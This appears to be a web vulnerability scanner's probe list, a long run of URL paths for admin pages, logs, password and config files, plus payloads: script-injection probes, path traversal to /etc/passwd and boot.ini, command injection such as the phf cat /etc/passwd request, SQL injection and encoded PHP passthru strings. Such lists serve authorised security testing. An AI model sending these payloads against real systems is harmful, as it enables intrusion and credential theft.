+_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+_vti_bin/_vti_aut/fp30reg.dll
+_vti_pvt/access.cnf
+_vti_pvt/botinfs.cnf
+_vti_pvt/bots.cnf
+_vti_pvt/service.cnf
+_vti_pvt/services.cnf
+_vti_pvt/svacl.cnf
+_vti_pvt/writeto.cnf
+_vti_pvt/linkinfo.cnf
+admin/
+isx.html
+//
+cgi-bin/blog/mt-check.cgi
+mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
+mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com
+mailman/listinfo
+doc/
+doc
+webalizer/
+web/
+usage/
+sitemap.xml
+phpshare/phpshare.php
+photo_album/apa_phpinclude.inc.php
+cgis/wwwboard/wwwboard.cgi
+cgis/wwwboard/wwwboard.pl
+affich.php?image=<script>alert(document.cookie)</script>
+diapo.php?rep=<script>alert(document.cookie)</script>
+index.php?rep=<script>alert(document.cookie)</script>
+admin/contextAdmin/contextAdmin.html
+fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
+fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
+fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
+fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
+blahb.ida
+blahb.idq
+ab2/\@AdminViewError
+.DS_Store
+.FBCIndex
+\"><img%20src=\"javascript:alert(document.domain)\">
+Survey/Survey.Htm
+WEBAGENT/CQMGSERV/CF-SINFO.TPF
+ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
+ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
+apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
+ba4.nsf
+BACLIENT
+postinfo.html
+na_admin/ataglance.html
+scripts/samples/search/qfullhit.htw
+scripts/samples/search/qsumrhit.htw
+JUNK(5).htw
+ttp://127.0.0.1:2301/
+file/../../../../../../../../etc/
+level/16/exec/-///pwd
+level/16/exec/-///show/configuration
+level/16
+level/16/exec/
+level/16/exec//show/access-lists
+level/16/level/16/exec//show/configuration
+level/16/level/16/exec//show/interfaces
+level/16/level/16/exec//show/interfaces/status
+level/16/level/16/exec//show/version
+level/16/level/16/exec//show/running-config/interface/FastEthernet
+level/16/exec//show
+level/17/exec//show
+level/18/exec//show
+level/19/exec//show
+level/20/exec//show
+level/21/exec//show
+level/22/exec//show
+level/23/exec//show
+level/24/exec//show
+level/25/exec//show
+level/26/exec//show
+level/27/exec//show
+level/28/exec//show
+level/29/exec//show
+level/30/exec//show
+level/31/exec//show
+level/32/exec//show
+level/33/exec//show
+level/34/exec//show
+level/35/exec//show
+level/36/exec//show
+level/37/exec//show
+level/38/exec//show
+level/39/exec//show
+level/40/exec//show
+level/41/exec//show
+level/42/exec//show
+level/43/exec//show
+level/44/exec//show
+level/45/exec//show
+level/46/exec//show
+level/47/exec//show
+level/48/exec//show
+level/49/exec//show
+level/50/exec//show
+level/51/exec//show
+level/52/exec//show
+level/53/exec//show
+level/54/exec//show
+level/55/exec//show
+level/56/exec//show
+level/57/exec//show
+level/58/exec//show
+level/59/exec//show
+level/60/exec//show
+level/61/exec//show
+level/62/exec//show
+level/63/exec//show
+level/64/exec//show
+level/65/exec//show
+level/66/exec//show
+level/67/exec//show
+level/68/exec//show
+level/69/exec//show
+level/70/exec//show
+level/71/exec//show
+level/72/exec//show
+level/73/exec//show
+level/74/exec//show
+level/75/exec//show
+level/76/exec//show
+level/77/exec//show
+level/78/exec//show
+level/79/exec//show
+level/80/exec//show
+level/81/exec//show
+level/82/exec//show
+level/83/exec//show
+level/84/exec//show
+level/85/exec//show
+level/86/exec//show
+level/87/exec//show
+level/88/exec//show
+level/89/exec//show
+level/90/exec//show
+level/91/exec//show
+level/92/exec//show
+level/93/exec//show
+level/94/exec//show
+level/95/exec//show
+level/96/exec//show
+level/97/exec//show
+level/98/exec//show
+level/99/exec//show
+gallery/captionator.php
+gallery/errors/configmode.php
+gallery/errors/needinit.php
+gallery/errors/reconfigure.php
+gallery/errors/unconfigured.php
+users.lst
+WS_FTP.LOG
+basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
+examples/jsp/snp/snoop.jsp
+nsn/env.bas
+lcgi/lcgitest.nlm
+com/
+com/novell/
+com/novell/webaccess
+cgi-bin/
+index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
+index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
+cgi-bin/ccbill-local.pl?cmd=MENU
+cgi-bin/ccbill-local.cgi?cmd=MENU
+cgi-bin/mastergate/search.cgi?search=0&search_on=all
+cgi-bin/Backup/add-passwd.cgi
+cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
+cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
+cgi-bin/bslist.cgi?email=x;ls
+cgi-bin/bsguest.cgi?email=x;ls
+cgi-bin/nbmember.cgi?cmd=list_all_users
+/admin/admin.shtml
+axis-cgi/buffer/command.cgi
+support/messages
+cgi-bin/where.pl?sd=ls%20/etc
+index.php?err=3&email=\"><script>alert(document.cookie)</script>
+forgot_password.php?email=\"><script>alert(document.cookie)</script>
+bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
+bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
+eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
+eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
+index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
+some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
+some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
+some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
+index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
+cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
+cgi-bin/phf
+cgi-bin/upload.cgi
+upload.cgi+
+server-status
+?PageServices
+?wp-cs-dump
+cfdocs.map
+publisher/
+cgi-bin/nph-publish.cgi
+cgi-bin/nph-test-cgi
+cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
+cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
+cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
+counter/1/n/n/0/3/5/0/a/123.gif
+iissamples/exair/search/search.asp
+cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
+../webserver.ini
+na_admin/
+cpqlogin.htm
+main_page.php
+cpanel/
+shopexd.asp?catalogid='42
+shopping/diag_dbtest.asp
+_vti_bin/fpcount.exe/
+forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
+zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
+wwwboard/passwd.txt
+login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
+login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
+SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
+SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
+acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
+ows-bin/perlidlc.bat?&dir
+photo/
+photodata/
+cgi-bin/photo/
+iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
+iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
+null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
+jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
+jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
+cgi-bin/include/new-visitor.inc.php
+msadc/msadcs.dll
+./../../../../../../../../../etc/*
+./../../../../../../../../../etc/passw*
+bytehoard/index.php?infolder=../../../../../../../../../../../etc/
+Search
+musicqueue.cgi
+cgi-bin/musicqueue.cgi
+scripts/tools/newdsn.exe
+OpenFile.aspx?file=../../../../../../../../../../boot.ini
+cgi-bin/windmail
+cgi-bin/windmail.exe
+cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
+cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
+index.php?vo=\"><script>alert(document.cookie);</script>
+.../.../.../.../.../.../.../.../.../.../etc/passwd
+cgi-bin/dose.pl?daily&somefile.txt&|ls|
+admin/database/wwForum.mdb
+../config.dat
+iisadmpwd/aexp2.htr
+iisadmpwd/aexp2b.htr
+iisadmpwd/aexp3.htr
+iisadmpwd/aexp4.htr
+iisadmpwd/aexp4b.htr
+/admin/aindex.htm
+cgi-bin/gbadmin.cgi?action=change_adminpass
+cgi-bin/gbadmin.cgi?action=change_automail
+cgi-bin/gbadmin.cgi?action=colors
+cgi-bin/gbadmin.cgi?action=setup
+cgi-bin/gbpass.pl
+shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
+hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
+admin/wg_user-info.ml
+banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
+c32web.exe/ChangeAdminPassword
+showmail.pl
+reademail.pl
+showmail.pl?Folder=<script>alert(document.cookie)</script>
+iissamples/exair/search/query.asp
+index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
+index.php?offset=[%20Problem%20Here%20]
+buddies.blt
+buddy.blt
+buddylist.blt
+cgi-sys/addalink.cgi
+cgi-sys/cgiecho
+cgi-sys/cgiemail
+cgi-sys/countedit
+cgi-sys/domainredirect.cgi
+cgi-sys/entropybanner.cgi
+cgi-sys/entropysearch.cgi
+cgi-sys/FormMail-clone.cgi
+cgi-sys/helpdesk.cgi
+cgi-sys/mchat.cgi
+cgi-sys/randhtml.cgi
+cgi-sys/realhelpdesk.cgi
+cgi-sys/realsignup.cgi
+cgi-sys/scgiwrap
+cgi-sys/signup.cgi
+pdf/
+sqlnet.log
+cgi-bin/GW5/GWWEB.EXE
+.psql_history
+acceso/
+access-log
+access.log
+access/
+access_log
+acciones/
+account/
+accounting/
+activex/
+adm/
+admin.htm
+admin.php
+admin.php3
+admin.shtml
+Administration/
+administration/
+administrator/
+Admin_files/
+advwebadmin/
+Agent/
+Agentes/
+agentes/
+Agents/
+analog/
+apache/
+app/
+applicattion/
+applicattions/
+apps/
+archivar/
+archive/
+archives/
+archivo/
+asp/
+Asp/
+atc/
+auth/
+awebvisit.stat
+ayuda/
+backdoor/
+backup/
+bak/
+banca/
+banco/
+bank/
+bbv/
+bdata/
+bdatos/
+beta/
+bin/
+boot/
+buy/
+buynow/
+c/
+cache-stats/
+caja/
+card/
+cards/
+cart/
+cash/
+ccard/
+ccbill/secure/ccbill.log
+cd/
+cdrom/
+cert/
+certificado/
+certificate
+certificates
+cfdocs/exampleapp/email/application.cfm
+cfdocs/exampleapp/publish/admin/addcontent.cfm
+cfdocs/exampleapp/publish/admin/application.cfm
+cfdocs/examples/httpclient/mainframeset.cfm
+cgi-bin/dbmlparser.exe
+client/
+cliente/
+clientes/
+clients/
+cm/
+code/
+communicator/
+compra/
+compras/
+compressed/
+conecta/
+config/checks.txt
+connect/
+console
+correo/
+counter/
+credit/
+crypto/
+css
+cuenta/
+cuentas/
+customers/
+dan_o.dat
+dat/
+data/
+dato/
+datos/
+db/
+dbase/
+demo/
+demos/
+dev/
+devel/
+development/
+dir/
+directory/
+DMR/
+doc-html/
+down/
+download/
+downloads/
+easylog/easylog.html
+ejemplo/
+ejemplos/
+employees/
+envia/
+enviamail/
+error_log
+es/
+excel/
+Excel/
+EXE/
+exe/
+fbsd/
+file/
+fileadmin/
+files/
+forum/
+forums/
+foto/
+fotos/
+fpadmin/
+ftp/
+gfx/
+global/
+graphics/
+guest/
+guestbook/
+guests/
+hidden/
+hitmatic/
+hitmatic/analyse.cgi
+hits.txt
+hit_tracker/
+home/
+homepage/
+htdocs/
+html/
+htpasswd
+HyperStat/stat_what.log
+hyperstat/stat_what.log
+ibill/
+idea/
+ideas/
+imagenes/
+img/
+imgs/
+import/
+impreso/
+includes/
+incoming/
+info/
+informacion/
+information/
+ingresa/
+ingreso/
+install/
+internal/
+intranet/
+invitado/
+invitados/
+java-plugin/
+java/
+jdbc/
+job/
+jrun/
+js
+lib/
+library/
+libro/
+linux/
+log.htm
+log.html
+log.txt
+logfile
+logfile.htm
+logfile.html
+logfile.txt
+logfile/
+logfiles/
+logger.html
+logger/
+logging/
+login/
+logs.txt
+logs/
+logs/access_log
+logs/error_log
+lost+found/
+mail/
+manage/cgi/cgiproc
+marketing/
+master.password
+mbox
+members/
+message/
+messaging/
+ministats/admin.cgi
+misc/
+mkstats/
+movimientos/
+mp3/
+mqseries/
+msql/
+msword/
+Msword/
+MSword/
+NetDynamic/
+NetDynamics/
+netscape/
+new
+new/
+news
+nl/
+noticias/
+odbc/
+officescan/cgi/jdkRqNotify.exe
+old/
+oracle
+oradata/
+order/
+orders/
+orders/checks.txt
+orders/mountain.cfg
+orders/orders.log
+orders/orders.txt
+outgoing/
+ows/
+pages/
+Pages/
+passwd
+passwd.adjunct
+passwd.txt
+passwdfile
+password
+password/
+passwords.txt
+passwords/
+PDG_Cart/
+people.list
+perl5/
+php/
+phpmyadmin/
+phpMyAdmin/
+pics/
+piranha/secure/passwd.php3
+pix/
+poll
+polls
+porn/
+pr0n/
+privado/
+private/
+prod/
+pron/
+prueba/
+pruebas/
+pub/
+public/
+publica/
+publicar/
+publico/
+purchase/
+purchases/
+pw/
+pwd.db
+python/
+readme
+README.TXT
+readme.txt
+register/
+registered/
+reports/
+reseller/
+restricted/
+retail/
+reviews/newpro.cgi
+root/
+sales/
+sample/
+samples/
+save/
+scr/
+scratch
+scripts/weblog
+search.vts
+search97.vts
+secret/
+secure/
+secured/
+sell/
+server_stats/
+service/
+services/
+servicio/
+servicios/
+setup/
+shop/
+shopper/
+software/
+solaris/
+source/
+Sources/
+spwd
+sql/
+src/
+srchadm
+ss.cfg
+ssi/
+staff/
+stat.htm
+stat/
+statistic/
+Statistics/
+statistics/
+stats.htm
+stats.html
+stats.txt
+stats/
+Stats/
+status/
+store/
+StoreDB/
+stylesheet/
+stylesheets/
+subir/
+sun/
+super_stats/access_logs
+super_stats/error_logs
+support/
+swf
+sys/
+system/
+tar/
+tarjetas/
+temp/
+template/
+temporal/
+test.htm
+test.html
+test.txt
+test/
+testing/
+tests/
+tmp/
+tools/
+tpv/
+trabajo/
+trafficlog/
+transito/
+tree/
+trees/
+updates/
+user/
+users/
+users/scripts/submit.cgi
+ustats/
+usuario/
+usuarios/
+vfs/
+w3perl/admin
+warez/
+web800fo/
+webaccess.htm
+webaccess/access-options.txt
+webadmin/
+webboard/
+webcart-lite/
+webcart/
+webdata/
+weblog/
+weblogs/
+webmaster_logs/
+WebShop/
+WebShop/logs/cc.txt
+WebShop/templates/cc.txt
+website/
+webstats/
+WebTrend/
+Web_store/
+windows/
+word/
+work/
+wstats/
+wusage/
+www-sql/
+www/
+wwwboard/wwwboard.cgi
+wwwboard/wwwboard.pl
+wwwjoin/
+wwwlog/
+wwwstats.html
+wwwstats/
+wwwthreads/3tvars.pm
+wwwthreads/w3tvars.pm
+zipfiles/
+_pages
+cgi-bin/.fhp
+cgi-bin/add_ftp.cgi
+cgi-bin/admin.cgi
+cgi-bin/admin.php
+cgi-bin/admin.php3
+cgi-bin/admin.pl
+cgi-bin/adminhot.cgi
+cgi-bin/adminwww.cgi
+cgi-bin/AnyBoard.cgi
+cgi-bin/AnyForm
+cgi-bin/AnyForm2
+cgi-bin/ash
+cgi-bin/ax-admin.cgi
+cgi-bin/ax.cgi
+cgi-bin/axs.cgi
+cgi-bin/bash
+cgi-bin/bnbform
+cgi-bin/bnbform.cgi
+cgi-bin/cart.pl
+cgi-bin/cgimail.exe
+cgi-bin/classifieds
+cgi-bin/classifieds.cgi
+cgi-bin/clickcount.pl?view=test
+cgi-bin/code.php
+cgi-bin/code.php3
+cgi-bin/count.cgi
+cgi-bin/csh
+cgi-bin/cstat.pl
+cgi-bin/c_download.cgi
+cgi-bin/dasp/fm_shell.asp
+cgi-bin/day5datacopier.cgi
+cgi-bin/dfire.cgi
+cgi-bin/dig.cgi
+cgi-bin/displayTC.pl
+cgi-bin/edit.pl
+cgi-bin/enter.cgi
+cgi-bin/environ.cgi
+cgi-bin/environ.pl
+cgi-bin/ex-logger.pl
+cgi-bin/excite
+cgi-bin/filemail
+cgi-bin/filemail.pl
+cgi-bin/ftp.pl
+cgi-bin/ftpsh
+cgi-bin/getdoc.cgi
+cgi-bin/glimpse
+cgi-bin/hitview.cgi
+cgi-bin/jailshell
+cgi-bin/jj
+cgi-bin/ksh
+cgi-bin/log-reader.cgi
+cgi-bin/log/
+cgi-bin/login.cgi
+cgi-bin/login.pl
+cgi-bin/logit.cgi
+cgi-bin/logs.pl
+cgi-bin/logs/
+cgi-bin/logs/access_log
+cgi-bin/logs/error_log
+cgi-bin/lookwho.cgi
+cgi-bin/maillist.cgi
+cgi-bin/maillist.pl
+cgi-bin/man.sh
+cgi-bin/meta.pl
+cgi-bin/minimal.exe
+cgi-bin/nlog-smb.cgi
+cgi-bin/nlog-smb.pl
+cgi-bin/noshell
+cgi-bin/nph-publish
+cgi-bin/ntitar.pl
+cgi-bin/pass
+cgi-bin/passwd
+cgi-bin/passwd.txt
+cgi-bin/password
+cgi-bin/post_query
+cgi-bin/pu3.pl
+cgi-bin/ratlog.cgi
+cgi-bin/responder.cgi
+cgi-bin/rguest.exe
+cgi-bin/rksh
+cgi-bin/rsh
+cgi-bin/search.cgi
+cgi-bin/search.pl
+cgi-bin/session/adminlogin
+cgi-bin/sh
+cgi-bin/show.pl
+cgi-bin/stat/
+cgi-bin/stats-bin-p/reports/index.html
+cgi-bin/stats.pl
+cgi-bin/stats.prf
+cgi-bin/stats/
+cgi-bin/statsconfig
+cgi-bin/stats_old/
+cgi-bin/statview.pl
+cgi-bin/survey
+cgi-bin/survey.cgi
+cgi-bin/tablebuild.pl
+cgi-bin/tcsh
+cgi-bin/test.cgi
+cgi-bin/test/test.cgi
+cgi-bin/textcounter.pl
+cgi-bin/tidfinder.cgi
+cgi-bin/tigvote.cgi
+cgi-bin/tpgnrock
+cgi-bin/ultraboard.cgi
+cgi-bin/ultraboard.pl
+cgi-bin/viewlogs.pl
+cgi-bin/visitor.exe
+cgi-bin/w3-msql
+cgi-bin/w3-sql
+cgi-bin/webais
+cgi-bin/webbbs.cgi
+cgi-bin/webbbs.exe
+cgi-bin/webutil.pl
+cgi-bin/webutils.pl
+cgi-bin/webwho.pl
+cgi-bin/wguest.exe
+cgi-bin/www-sql
+cgi-bin/wwwboard.cgi.cgi
+cgi-bin/wwwboard.pl
+cgi-bin/wwwstats.pl
+cgi-bin/wwwthreads/3tvars.pm
+cgi-bin/wwwthreads/w3tvars.pm
+cgi-bin/zsh
+adsamples/config/site.csc
+advworks/equipment/catalog_type.asp
+carbo.dll
+clocktower/
+localstart.asp
+market/
+mspress30/
+sam
+sam.bin
+sam._
+samples/search/queryhit.htm
+scripts/counter.exe
+scripts/cphost.dll
+scripts/fpadmcgi.exe
+scripts/postinfo.asp
+scripts/samples/ctguestb.idc
+scripts/samples/search/webhits.exe
+site/iissamples/
+vc30/
+_mem_bin/
+_mem_bin/FormsLogin.asp
+perl/files.pl
+perl5/files.pl
+scripts/convert.bas
+owa_util%2esignature
+cgi-dos/args.bat
+custdata/
+hostingcontroller/
+data.sql
+databases/
+databse.sql
+db.sql
+etc/passwd
+img-sys/
+java-sys/
+javadoc/
+log/
+manager/
+manual/
+exchange/
+pls/admin
+account.nsf
+accounts.nsf
+admin.nsf
+admin4.nsf
+admin5.nsf
+agentrunner.nsf
+alog.nsf
+archive/a_domlog.nsf
+archive/l_domlog.nsf
+a_domlog.nsf
+billing.nsf
+bookmark.nsf
+books.nsf
+busytime.nsf
+calendar.nsf
+certa.nsf
+certlog.nsf
+certsrv.nsf
+chatlog.nsf
+clbusy.nsf
+cldbdir.nsf
+clusta4.nsf
+collect4.nsf
+cpa.nsf
+customerdata.nsf
+da.nsf
+database.nsf
+db.nsf
+dclf.nsf
+DEASAppDesign.nsf
+DEASLog.nsf
+DEASLog01.nsf
+DEASLog02.nsf
+DEASLog03.nsf
+DEASLog04.nsf
+DEASLog05.nsf
+decsadm.nsf
+decsdoc.nsf
+decslog.nsf
+DEESAdmin.nsf
+default.nsf
+dirassist.nsf
+doladmin.nsf
+dols_help.nsf
+domadmin.nsf
+domcfg.nsf
+event.nsf
+events.nsf
+events5.nsf
+group.nsf
+groups.nsf
+help5_admin.nsf
+help5_client.nsf
+help5_designer.nsf
+homepage.nsf
+iNotes/Forms5.nsf
+iNotes/Forms5.nsf/$DefaultNav
+jotter.nsf
+kbccv11.nsf
+kbnv11.nsf
+kbssvv11.nsf
+lcon.nsf
+ldap.nsf
+leiadm.nsf
+leilog.nsf
+leivlt.nsf
+log4a.nsf
+lsxlc.nsf
+l_domlog.nsf
+mab.nsf
+mail/adminisist.nsf
+mail1.box
+mail10.box
+mail2.box
+mail3.box
+mail4.box
+mail5.box
+mail6.box
+mail7.box
+mail8.box
+mail9.box
+mailw46.nsf
+msdwda.nsf
+mtatbls.nsf
+mtdata/mtstore.nsf
+mtstore.nsf
+nntp/nd000000.nsf
+nntp/nd000001.nsf
+nntp/nd000002.nsf
+nntp/nd000003.nsf
+nntp/nd000004.nsf
+nntppost.nsf
+notes.nsf
+ntsync4.nsf
+ntsync45.nsf
+perweb.nsf
+private.nsf
+public.nsf
+qpadmin.nsf
+quickplace/quickplace/main.nsf
+quickstart/qstart50.nsf
+quickstart/wwsample.nsf
+readme.nsf
+reports.nsf
+sample/faqw46
+sample/framew46
+sample/pagesw46
+sample/siregw46
+sample/site1w4646
+sample/site2w4646
+sample/site3w4646
+schema50.nsf
+secret.nsf
+setupweb.nsf
+smbcfg.nsf
+smconf.nsf
+smency.nsf
+smmsg.nsf
+smquar.nsf
+smsolar.nsf
+smtime.nsf
+smtp.box
+smtp.nsf
+smtpibwq.nsf
+smtpobwq.nsf
+smtptbls.nsf
+smvlog.nsf
+software.nsf
+srvnam.htm
+statmail.nsf
+stauths.nsf
+stautht.nsf
+stconf.nsf
+stconfig.nsf
+stdnaset.nsf
+stdomino.nsf
+stlog.nsf
+streg.nsf
+stsrc.nsf
+test.nsf
+today.nsf
+userreg.nsf
+users.nsf
+vpuserinfo.nsf
+web.nsf
+webuser.nsf
+welcome.nsf
+wksinst.nsf
+finance.xls
+finances.xls
+abonnement.asp
+acartpath/signin.asp?|-|0|404_Object_Not_Found
+add_acl
+admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
+admin/auth.php
+admin/cfg/configscreen.inc.php+
+admin/cfg/configsite.inc.php+
+admin/cfg/configsql.inc.php+
+admin/cfg/configtache.inc.php+
+admin/cms/htmltags.php
+admin/credit_card_info.php
+admin/exec.php3
+admin/index.php
+admin/modules/cache.php+
+admin/objects.inc.php4
+admin/script.php
+admin/settings.inc.php+
+admin/templates/header.php
+admin/upload.php
+admin_t/include/aff_liste_langue.php
+adv/gm001-mc/
+aff_news.php
+approval/ts_app.htm
+archive.asp
+archive_forum.asp
+ashnews.php
+auth.inc.php
+b2-tools/gm-2-b2.php
+bandwidth/index.cgi
+basilix.php3
+bigsam_guestbook.php?displayBegin=9999...9999
+bin/common/user_update_passwd.pl
+biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
+biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
+board/index.php
+board/philboard_admin.asp+
+boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
+bugtest+/+
+caupo/admin/admin_workspace.php
+ccbill/whereami.cgi
+chat_dir/register.php
+checkout_payment.php
+communique.asp
+community/forumdisplay.php
+community/index.php?analized=anything
+community/member.php
+compte.php
+config/html/cnf_gi.htm
+convert-date.php
+cp/rac/nsManager.cgi
+CSNews.cgi
+csPassword.cgi?command=remove%20
+cutenews/comments.php
+cutenews/search.php
+cutenews/shownews.php
+Data/settings.xml+
+database/metacart.mdb+
+db.php
+dbabble
+dcp/advertiser.php
+defines.php
+dltclnt.php
+doc/admin/index.php
+docs/NED
+dotproject/modules/files/index_table.php
+dotproject/modules/projects/addedit.php
+dotproject/modules/projects/view.php
+dotproject/modules/projects/vw_files.php
+dotproject/modules/tasks/addedit.php
+dotproject/modules/tasks/viewgantt.php
+do_map
+do_subscribe
+email.php
+emml_email_func.php
+emumail.cgi?type=.%00
+entete.php
+enteteacceuil.php
+etc/shadow+
+eventcal2.php.php
+ez2000/ezadmin.cgi
+ez2000/ezboard.cgi
+ez2000/ezman.cgi
+faqman/index.php
+filemanager/index.php3
+filemgmt/brokenfile.php
+filemgmt/singlefile.php
+filemgmt/viewcat.php
+filemgmt/visit.php
+foro/YaBB.pl
+forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
+forum-ra.asp?n=../../../../../../../../../etc/passwd
+forum-ra.asp?n=../../../../../../../../../etc/passwd%00
+forum-ra.asp?n=/../../../../../../../../../../../boot.ini
+forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
+forum-ra.asp?n=/etc/passwd
+forum-ra.asp?n=/etc/passwd%00
+forum-ra.asp?n=c:\boot.ini
+forum-ra_professionnel.asp?n=%60/etc/passwd%60
+forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
+forum-ra_professionnel.asp?n=../../boot.ini
+forum-ra_professionnel.asp?n=/....../boot.ini
+forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
+forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
+forum-ra_professionnel.asp?n=/../../../etc/passwd
+forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
